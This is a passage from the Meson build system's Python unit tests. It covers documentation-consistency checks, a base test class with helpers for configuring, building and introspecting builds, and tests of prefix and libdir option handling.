self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
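# Usage sketch (assumed markdown layout, see the tests below): given a document
# where a '## Universal options' heading is followed by some other '## ...'
# heading,
#   sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
#   content = self._get_section_content('Universal options', sections, md)
# returns the text between those two headings (or up to the end of the file
# for the last section).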
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
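# Illustrative example: a data row such as
#   '| werror | false | Treat warnings as errors |'
# yields m.group(1) == 'werror', while a separator row like '| ------ | ------ |'
# still matches but with group(1) == None.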
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
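# Illustrative example (padded as in the docs): a row like
#   '| debugoptimized | true    | 2         |'
# yields m.groups() == ('debugoptimized', 'true', '2').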
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
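# Assumed layout of the vim syntax file (a sketch): the builtins are listed as
# backslash-continued lines, roughly
#   syn keyword mesonBuiltin
#     \ add_global_arguments
#     \ add_languages
#     ...
# so splitting the matched text on '\' (and dropping the leading keyword part)
# yields the set of function names.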
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple[str, str]]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
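# Each entry is a (path, digest) pair, e.g. roughly
#   ('dependencies/data/CMakeLists.txt', '<sha256 hexdigest>')
# where the path is relative to mesonbuild/ in posix form (entry shown is
# illustrative).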
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
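# e.g. a compile command like 'cl @sub/target.obj.rsp' splits into
# compiler == 'cl' and rsp == 'sub/target.obj.rsp' (path is illustrative).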
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
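# Each entry is the already-split argument list; e.g. a (made-up) log line
#   'Command line: cc -I/some/dir testfile.c -o output.exe'
# would yield ['cc', '-I/some/dir', 'testfile.c', '-o', 'output.exe'].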
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exist
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
